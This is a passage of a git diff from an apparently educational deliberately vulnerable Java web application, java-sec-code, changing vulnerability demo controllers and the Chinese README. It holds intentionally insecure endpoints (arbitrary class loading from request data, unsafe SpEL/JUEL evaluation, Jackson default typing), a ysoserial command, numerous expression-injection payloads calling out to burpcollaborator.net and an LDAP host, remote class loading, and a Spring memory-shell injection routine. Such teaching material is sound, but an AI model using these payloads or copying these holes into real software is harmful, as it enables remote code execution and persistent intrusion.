() {
- @Override
- public void onMessage(ByteBuffer message) {
- try {
- message.clear();
- i++;
- process(message, session);
- } catch (Exception ignored) {
- }
- }
- });
- }
-}
\ No newline at end of file
diff --git a/src/main/java/org/joychou/controller/ClassDataLoader.java b/src/main/java/org/joychou/controller/ClassDataLoader.java
deleted file mode 100644
index acd4ff3f..00000000
--- a/src/main/java/org/joychou/controller/ClassDataLoader.java
+++ /dev/null
@@ -1,31 +0,0 @@
-package org.joychou.controller;
-
-import org.slf4j.Logger;
-import org.slf4j.LoggerFactory;
-import org.springframework.web.bind.annotation.RequestMapping;
-import org.springframework.web.context.request.RequestContextHolder;
-import org.springframework.web.context.request.ServletRequestAttributes;
-
-import javax.servlet.http.HttpServletRequest;
-
-public class ClassDataLoader {
-
- protected final Logger logger = LoggerFactory.getLogger(this.getClass());
-
- @RequestMapping("/classloader")
- public void classData() {
- try{
- ServletRequestAttributes sra = (ServletRequestAttributes) RequestContextHolder.getRequestAttributes();
- HttpServletRequest request = sra.getRequest();
- String classData = request.getParameter("classData");
-
- byte[] classBytes = java.util.Base64.getDecoder().decode(classData);
- java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
- defineClassMethod.setAccessible(true);
- Class cc = (Class) defineClassMethod.invoke(ClassLoader.getSystemClassLoader(), null, classBytes, 0, classBytes.length);
- cc.newInstance();
- }catch(Exception e){
- logger.error(e.toString());
- }
- }
-}
diff --git a/src/main/java/org/joychou/controller/Deserialize.java b/src/main/java/org/joychou/controller/Deserialize.java
index 55c82ab2..45662e9c 100644
--- a/src/main/java/org/joychou/controller/Deserialize.java
+++ b/src/main/java/org/joychou/controller/Deserialize.java
@@ -1,6 +1,5 @@
package org.joychou.controller;
-import com.fasterxml.jackson.databind.ObjectMapper;
import org.joychou.config.Constants;
import org.joychou.security.AntObjectInputStream;
import org.slf4j.Logger;
@@ -30,14 +29,17 @@ public class Deserialize {
protected final Logger logger = LoggerFactory.getLogger(this.getClass());
/**
- * java -jar ysoserial.jar CommonsCollections5 "open -a Calculator" | base64
- * http://localhost:8080/deserialize/rememberMe/vuln
+ * java -jar ysoserial.jar CommonsCollections5 "open -a Calculator" | base64
+ * Add the result to rememberMe cookie.
+ *
+ * http://localhost:8080/deserialize/rememberMe/vuln
*/
@RequestMapping("/rememberMe/vuln")
public String rememberMeVul(HttpServletRequest request)
throws IOException, ClassNotFoundException {
Cookie cookie = getCookie(request, Constants.REMEMBER_ME_COOKIE);
+
if (null == cookie) {
return "No rememberMe cookie. Right?";
}
@@ -54,9 +56,9 @@ public String rememberMeVul(HttpServletRequest request)
}
/**
- * Check deserialize class using black list.
- * Or update commons-collections to 3.2.2 or above.Serialization support for org.apache.commons.collections.functors.InvokerTransformer is disabled for security reasons.To enable it set system property 'org.apache.commons.collections.enableUnsafeSerialization' to 'true',but you must ensure that your application does not de-serialize objects from untrusted sources.
- * http://localhost:8080/deserialize/rememberMe/security
+ * Check deserialize class using black list.
+ *
+ * http://localhost:8080/deserialize/rememberMe/security
*/
@RequestMapping("/rememberMe/security")
public String rememberMeBlackClassCheck(HttpServletRequest request)
@@ -84,17 +86,4 @@ public String rememberMeBlackClassCheck(HttpServletRequest request)
return "I'm very OK.";
}
- // String payload = "[\"org.jsecurity.realm.jndi.JndiRealmFactory\", {\"jndiNames\":\"ldap://30.196.97.50:1389/yto8pc\"}]";
- @RequestMapping("/jackson")
- public void Jackson(String payload) {
- ObjectMapper mapper = new ObjectMapper();
- mapper.enableDefaultTyping();
- try {
- Object obj = mapper.readValue(payload, Object.class);
- mapper.writeValueAsString(obj);
- } catch (IOException e) {
- e.printStackTrace();
- }
- }
-
}
diff --git a/src/main/java/org/joychou/controller/Dotall.java b/src/main/java/org/joychou/controller/Dotall.java
deleted file mode 100644
index f6746354..00000000
--- a/src/main/java/org/joychou/controller/Dotall.java
+++ /dev/null
@@ -1,31 +0,0 @@
-package org.joychou.controller;
-
-
-
-import java.net.URLDecoder;
-import java.nio.charset.StandardCharsets;
-import java.util.regex.Pattern;
-
-
-/**
- * Spring Security CVE-2022-22978
- * 漏洞相关wiki
- * @author JoyChou @2023-01-212
- */
-
-public class Dotall {
-
-
- /**
- * 官方spring-security修复commit记录
- */
- public static void main(String[] args) throws Exception{
- Pattern vuln_pattern = Pattern.compile("/black_path.*");
- Pattern sec_pattern = Pattern.compile("/black_path.*", Pattern.DOTALL);
-
- String poc = URLDecoder.decode("/black_path%0a/xx", StandardCharsets.UTF_8.toString());
- System.out.println("Poc: " + poc);
- System.out.println("Not dotall: " + vuln_pattern.matcher(poc).matches()); // false,非dotall无法匹配\r\n
- System.out.println("Dotall: " + sec_pattern.matcher(poc).matches()); // true,dotall可以匹配\r\n
- }
-}
diff --git a/src/main/java/org/joychou/controller/EL.java b/src/main/java/org/joychou/controller/EL.java
new file mode 100644
index 00000000..8b6463a6
--- /dev/null
+++ b/src/main/java/org/joychou/controller/EL.java
@@ -0,0 +1,173 @@
+package org.joychou.controller;
+
+import org.flowable.common.engine.api.variable.VariableContainer;
+import org.flowable.engine.impl.el.ProcessExpressionManager;
+import org.springframework.expression.ExpressionParser;
+import org.springframework.expression.spel.standard.SpelExpressionParser;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RestController;
+import org.springframework.web.context.WebApplicationContext;
+import org.springframework.web.servlet.handler.AbstractHandlerMapping;
+
+import javax.el.ELProcessor;
+import java.io.IOException;
+import java.lang.reflect.Field;
+import java.lang.reflect.Method;
+import java.net.URL;
+import java.net.URLClassLoader;
+import java.util.ArrayList;
+import java.util.LinkedHashSet;
+
+
+@RestController
+public class EL {
+
+ @RequestMapping("/el")
+ public String el(String expression) {
+ ExpressionParser parser = new SpelExpressionParser();
+ // fix method: SimpleEvaluationContext
+ return parser.parseExpression(expression).getValue().toString();
+ }
+
+ @RequestMapping("/juel")
+ public String juel(String expression) {
+// String payload = "${''.getClass().forName('jdk.jshell.JShell').getMethod('create').invoke(null).eval('java.lang.Runtime.getRuntime().exec(\"notepad\")')}";
+
+
+ Object result = new ProcessExpressionManager().createExpression(expression).getValue(new VariableContainer() {
+ @Override
+ public boolean hasVariable(String s) {
+ return false;
+ }
+
+ @Override
+ public Object getVariable(String s) {
+ return null;
+ }
+
+ @Override
+ public void setVariable(String s, Object o) {
+
+ }
+
+ @Override
+ public void setTransientVariable(String s, Object o) {
+
+ }
+
+ @Override
+ public String getTenantId() {
+ return null;
+ }
+ });
+
+ return result.toString();
+ }
+
+ public static void main(String[] args) throws IOException, ClassNotFoundException {
+// String payload = "''.getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"java.lang.Runtime.getRuntime().exec('ping 1uwnjnqpo6cyg9g825afrsvunltphe.burpcollaborator.net')\")";
+// String payload = "''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('calc.exe')";
+// String payload = "''.getClass().forName('java.net.InetAddress').getMethod('getByName',''.getClass()).invoke('','ylnkakhmf33v7675t21cipmreikl8a.burpcollaborator.net')";
+// String payload = "\"\".getClass().forName(\"java.lang.ProcessBuilder\").getDeclaredConstructors()[0].newInstance([\"ping\",\"p0qbpbwduuimmxmw8tg3xg1it9zen3.burpcollaborator.net\"]).start()";
+ String payload = "${\"\".getClass().forName(\"java.net.InetAddress\").getMethod(\"getByName\",\"\".getClass()).invoke(\"\",\"if1444b69nxf1q1pnmvwc9gb82e12q.burpcollaborator.net\")}\n";
+// String payload = "\"\".getClass().forName(\"java.net.InetSocketAddress\").getDeclaredConstructors()[2].newInstance([\"uqoimkc58pr8g1oe5i7ai71lyc4bs0.burpcollaborator.net\",80])";
+// String payload = "\"\".getClass().forName(\"java.net.Socket\").getDeclaredConstructors()[9].newInstance(\"uqoimkc58pr8g1oe5i7ai71lyc4bs0.burpcollaborator.net\",Integer.valueOf(80))";
+// String payload = "\"\".getClass().forName(\"org.yaml.snakeyaml.Yaml\").getDeclaredConstructors()[6].newInstance().load(\"!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ['http://ej12f45p19ks9lhyy20ubru5rwxwll.burpcollaborator.net/Yaml']]]]\")";
+// String payload = "\"\".getClass().forName(\"java.lang.ProcessBuilder\").getDeclaredConstructors()[0].newInstance([\"ping\",\"t3xhzjp4lo47t01dihk9v6ekbbhc51.burpcollaborator.net\"]).start()";
+// String payload = "''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"java.lang.Runtime.getRuntime().exec('ping s0tgwim3in16qzycfgh8s5bj8aee23.burpcollaborator.net')\")";
+// String payload = "''.getClass().forName('java.net.URL').getDeclaredConstructors()[2].newInstance('http://kl98ha7v3fmybrj40820dxwbt2ztvhk.burpcollaborator.net/URL').openStream()";
+// String payload = "''.getClass().forName('jdk.jshell.JShell').getMethod('create').invoke(null).eval('java.lang.Runtime.getRuntime().exec(\"calc\")')";
+
+// String payload = "''.getClass().forName('jdk.jshell.JShell').getMethod('create').invoke(null).eval('new java.lang.ProcessBuilder().command(\"cmd /c calc\".split(\" \")).start()')";
+
+ // 调用loadClass之前不会发出http请求,调用之后才发出。
+// new URLClassLoader(new URL[]{new URL("http://bp4zl1bm76qpfinv4z6rho02xt3kw8l.burpcollaborator.net")}, "".getClass().getClassLoader()).loadClass("EvilBB01");
+
+// String[] payloads = new String[]{
+// "''.getClass().forName('java.net.URL').getDeclaredConstructors()[0].toString()",
+// "''.getClass().forName('java.net.URL').getDeclaredConstructors()[1].toString()",
+// "''.getClass().forName('java.net.URL').getDeclaredConstructors()[2].toString()",
+// "''.getClass().forName('java.net.URL').getDeclaredConstructors()[3].toString()",
+// "''.getClass().forName('java.net.URL').getDeclaredConstructors()[4].toString()",
+// "''.getClass().forName('java.net.URL').getDeclaredConstructors()[5].toString()",
+// "''.getClass().forName('java.net.URL').getDeclaredConstructors()[6].toString()",
+// "''.getClass().forName('java.net.URL').getDeclaredConstructors()[7].toString()",
+// "''.getClass().forName('java.net.URL').getDeclaredConstructors()[8].toString()",
+// "''.getClass().forName('java.net.URL').getDeclaredConstructors()[9].toString()",
+// };
+ ELProcessor processor = new ELProcessor();
+//
+//// String payload = "''.getClass().forName('org.yaml.snakeyaml.Yaml').getDeclaredConstructors()[0].toString()";
+// for (int i = 0; i < payloads.length; i++) {
+// System.out.println(processor.eval(payloads[i]).toString());
+// }
+
+// System.out.println(processor.eval(payload).toString());
+
+// (new java.io.FileOutputStream("/home/cqq/result.txt")).write((new java.lang.ProcessBuilder("ls","-al").start().getInputStream().readAllBytes()));
+// new java.lang.ProcessBuilder("cmd","/c","calc").start();
+// List eval = JShell.create().eval();
+// Process process = (Process) processor.eval(payload);
+// InputStream inputStream = process.getInputStream();
+// StringBuilder stringBuilder2 = new StringBuilder();
+// BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
+// String line;
+// while((line = bufferedReader.readLine()) != null) {
+// stringBuilder2.append(line).append("\n");
+// }
+//
+// String result = stringBuilder2.toString();
+// System.out.println(result);
+
+// ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
+ java.net.URL url = new URL("http://localhost:8080/com/SpringMemShell.class");
+ URLClassLoader classLoader = new URLClassLoader(new URL[]{url});
+ classLoader.loadClass("com.SpringMemShell");
+ }
+
+ static void injectMemShell(){
+
+ try{
+ // 1. 反射 org.springframework.context.support.LiveBeansView 类 applicationContexts 属性
+ Field field = Class.forName("org.springframework.context.support.LiveBeansView").getDeclaredField("applicationContexts");
+ // 2. 属性被 private 修饰,所以 setAccessible true
+ field.setAccessible(true);
+ // 3. 获取一个 ApplicationContext 实例
+ WebApplicationContext context =(WebApplicationContext) ((LinkedHashSet)field.get(null)).iterator().next();
+
+ AbstractHandlerMapping abstractHandlerMapping = (AbstractHandlerMapping)context.getBean("requestMappingHandlerMapping");
+ field = AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
+ field.setAccessible(true);
+ ArrayList
diff --git a/README_zh.md b/README_zh.md
index b5c658c3..8beb7805 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -2,11 +2,7 @@
对于学习Java漏洞代码来说,`Java Sec Code`是一个非常强大且友好的项目。
-[英文文档](https://github.com/JoyChou93/java-sec-code/blob/master/README.md) 😋
-
-## 招聘
-
-[Alibaba招聘-安全攻防/研究(P5-P7)](https://github.com/JoyChou93/java-sec-code/wiki/Alibaba-Purple-Team-Job-Description)
+[英文文档](https://github.com/JoyChou93/java-sec-code/blob/master/README.md)
## 介绍
@@ -30,7 +26,6 @@ joychou/joychou123
- [CORS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CORS.java)
- [CRLF Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CRLFInjection.java)
- [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/security/WebSecurityConfig.java)
-- [CVE-2022-22978](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/security/WebSecurityConfig.java)
- [Deserialize](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Deserialize.java)
- [Fastjson](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Fastjson.java)
- [File Upload](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/FileUpload.java)
@@ -40,14 +35,12 @@ joychou/joychou123
- [Log4j](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Log4j.java)
- [ooxmlXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java)
- [PathTraversal](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/PathTraversal.java)
-- [QLExpress](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/QLExpress.java)
- [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)
- Runtime
- ProcessBuilder
- ScriptEngine
- Yaml Deserialize
- Groovy
-- [Shiro](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Shiro.java)
- [SpEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SpEL.java)
- [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java)
- [SSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSRF.java)
@@ -58,7 +51,7 @@ joychou/joychou123
- [XSS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XSS.java)
- [XStream](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XStreamRce.java)
- [XXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XXE.java)
-- [JWT](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Jwt.java)
+
## 漏洞说明
@@ -75,7 +68,6 @@ joychou/joychou123
- [SSTI](https://github.com/JoyChou93/java-sec-code/wiki/SSTI)
- [URL whitelist Bypass](https://github.com/JoyChou93/java-sec-code/wiki/URL-whtielist-Bypass)
- [XXE](https://github.com/JoyChou93/java-sec-code/wiki/XXE)
-- [JWT](https://github.com/JoyChou93/java-sec-code/wiki/JWT)
- [Others](https://github.com/JoyChou93/java-sec-code/wiki/others)
@@ -143,7 +135,7 @@ Viarus
例子:
```
-http://localhost:8080/java-sec-code-1.0.0/rce/runtime/exec?cmd=whoami
+http://localhost:8080/java-sec-code-1.0.0/rce/exec?cmd=whoami
```
返回:
@@ -199,7 +191,12 @@ Tomcat默认JSESSION会话有效时间为30分钟,所以30分钟不操作会
核心开发者: [JoyChou](https://github.com/JoyChou93).其他开发者:[lightless](https://github.com/lightless233), [Anemone95](https://github.com/Anemone95)。欢迎各位提交PR。
-## 支持
+## 捐赠
+
+如果你喜欢这个项目,你可以捐款来支持我。 有了你的支持,我将能够更好地制作`Java sec code`项目。
+
+### Alipay
-如果你喜欢这个项目,你可以star该项目支持我。 有了你的支持,我将能够更好地制作`Java sec code`项目。
+扫描支付宝二维码支持`Java sec code`。
+